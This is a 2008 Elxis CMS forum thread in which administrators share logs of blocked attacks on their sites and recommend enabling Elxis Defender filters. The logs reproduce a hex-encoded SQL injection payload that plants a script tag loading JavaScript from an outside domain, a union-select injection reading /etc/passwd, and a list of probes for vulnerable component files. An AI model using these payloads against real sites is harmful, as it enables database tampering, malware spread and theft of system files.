Elxis CMS Forum

Support => Security => Topic started by: CREATIVE Options on August 31, 2008, 13:14:34

Title: New session of attacks have started.
Post by: CREATIVE Options on August 31, 2008, 13:14:34: New attacks from several ip have started.

There have recently been several attempts to hack websites that I manage.
Thanks to Elxis Defender and some custom work I did all the websites were found to be SAFE after the attempts.

Here is a list of the attempts:
Elxis Defender blocked an attack to your site

ATTACKER IP ADDRESS: 118.167.16.97
Requested URI:
Code: [Select]
/?\';DECLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));EXEC(@S);DATE: 27-08-2008 09:14:38

ATTACKER IP ADDRESS: 118.167.16.97
Requested URI:
Code: [Select]
/?\';DECLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));EXEC(@S);DATE: 27-08-2008 09:14:38

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI:
Code: [Select]
/administrator/components/com_chronocontact/excelwriter/PPS/File.phpDATE: 31-08-2008 07:20:52

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI:
Code: [Select]
/components/com_mosmedia/media.divs.phpDATE: 31-08-2008 06:49:46

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI:
Code: [Select]
/administrator/components/com_wmtportfolio/admin.wmtportfolio.phpDATE: 31-08-2008 03:34:14

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI:
Code: [Select]
/components/com_sitemap/sitemap.xml.phpDATE: 31-08-2008 02:03:43

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI:
Code: [Select]
/administrator/components/com_jcs/view/history.phpDATE: 30-08-2008 23:43:20

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI:
Code: [Select]
/components/com_smf/smf.phpDATE: 30-08-2008 23:25:28

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI:
Code: [Select]
/administrator/components/com_mosmedia/includes/purchase.html.phpDATE: 30-08-2008 23:19:39

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI:
Code: [Select]
/components/com_mp3_allopass/allopass-error.phpDATE: 30-08-2008 22:42:33

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI:
Code: [Select]
/components/com_thopper/inc/responses_type.phpDATE: 30-08-2008 22:23:49

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI:
Code: [Select]
/components/com_slideshow/admin.slideshow1.phpDATE: 30-08-2008 20:41:53

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI:
Code: [Select]
/administrator/components/com_jcs/view/register.phpDATE: 30-08-2008 20:09:05

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI:
Code: [Select]
/administrator/components/com_peoplebook/param.peoplebook.phpDATE: 30-08-2008 20:03:38

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI:
Code: [Select]
/components/com_moodle/moodle.phpDATE: 30-08-2008 19:35:51

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI:
Code: [Select]
/administrator/components/com_mosmedia/includes/credits.html.phpDATE: 30-08-2008 19:26:40

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI:
Code: [Select]
/modules/MambWeather/Savant2/Savant2_Plugin_options.phpDATE: 30-08-2008 18:57:43

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI:
Code: [Select]
/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.phpDATE: 30-08-2008 18:41:11

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI:
Code: [Select]
/administrator/components/com_jcs/jcs.function.phpDATE: 30-08-2008 17:51:06

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI:
Code: [Select]
/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.phpDATE: 30-08-2008 16:21:40

Conclusion:
All the users MUST enable the Elxis Defender with ALL the filters ON, (you can find the basic list of the filters for the Elxis Defender inside the Elxis Defender options).
Go to Tools -> Elxis Defender -> and fill in ALL Example Filters

These options can protect you from almost all attempts to attack your website.
Some people will say : "Yes, ok I will enable all this but my website will be slower"

My answer to this question is simple: "You have the option to move your website to a better hosting provider and you will be sure that you are secure and you will not lose your data from your website".

Also if you see the targets of the attempts to attack the targets are for other CMS, and once again I would like to say again DO NOT use not verified modules, mambots, components from the Elxis Team use ONLY these from the Elxis Download Center.

*Modification to add more
Title: Re: New session of attacks have started.
Post by: Ivan Trebješanin on August 31, 2008, 15:14:34: There are multiple attacks from same IP in your list. You should enable blocking of attacker's IP.
Title: Re: New session of attacks have started.
Post by: nikos65 on September 04, 2008, 22:24:19: New attack !!! Safe with Elxis Defender ;D

Elxis Defender blocked an attack to your site
ATTACKER IP ADDRESS: 70.110.158.71 (blocked)
Requested URI: /index.php?option=1 union all select load_file(char(47,101,116,99,47,112,97,115,115,119,100))--
DATE: 04-09-2008 11:12:11
Attack was logged